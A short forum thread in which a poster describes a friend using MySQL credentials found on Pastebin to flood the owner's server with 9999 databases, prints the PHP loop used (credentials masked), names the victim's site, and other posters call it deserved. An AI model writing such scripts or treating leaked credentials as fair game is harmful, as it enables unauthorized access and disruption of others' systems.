This is kinda messed up

My friend goes on to http://www.pastebin.com/ and looks for on the recent posts well one day happend. some dude left his mysql info on there and my friend wrote a php script to make 9999 databases. I dont think thats so nice but well if ya post your mysql database info on a public site then maybe it was ment to happen?

<?php  $dbuser = "****";  $dbpass = "****";  $dbhost = "***";  $mysql = mysql_connect($dbhost, $dbuser, $dbpass);  for($i=1; $i<=9999; $i++) {  	mysql_create_db("db" . rand(0, 9999));  	echo "Database created!";  }  ?> 

thats how he did it. then he looked on the site and found out he is a hacker so he basicly hacked a hacker so he deserved it in my concent? what do you all have to say

He must not have been a hacker if he put his mysql database on it. Either that or he purposely put it there. I dunno, I really don’t feel any remorse for any hackers. They hack sites, they get hacked, it seems like a big ol example of Karma if you ask me.

here is his site http://wow.pkaclan.com/content.php

i think hacking is cool (if you can do it), understand me when i say that because i am not saying vote hackers for president, but it is a pretty decent talent to have, i wish i could wrap my head around it all.

[:ninja:EZEkiel:ninja:]

I knew a hacker one time. Man this was the laziest guy I’d ever met. He’d come into college at 2 in the afternoon, not bother with the course and just jump onto the net until about 8 than night when they would close the college, he’d go home and get back on the net until about 5 or 6 in the morning and then go to bed, getting up at 2 and the whole process would start again. Whenever I think of hackers I think of that arsehole.

I have the knowledge to hack… but… I dont go out and do it at all… I just know a lot about computers… how they work… and what tools do what ect… All hackers I know are somewhat lazy… But if a guy leaves his MySQL stuff out there… then he kinda deserves it.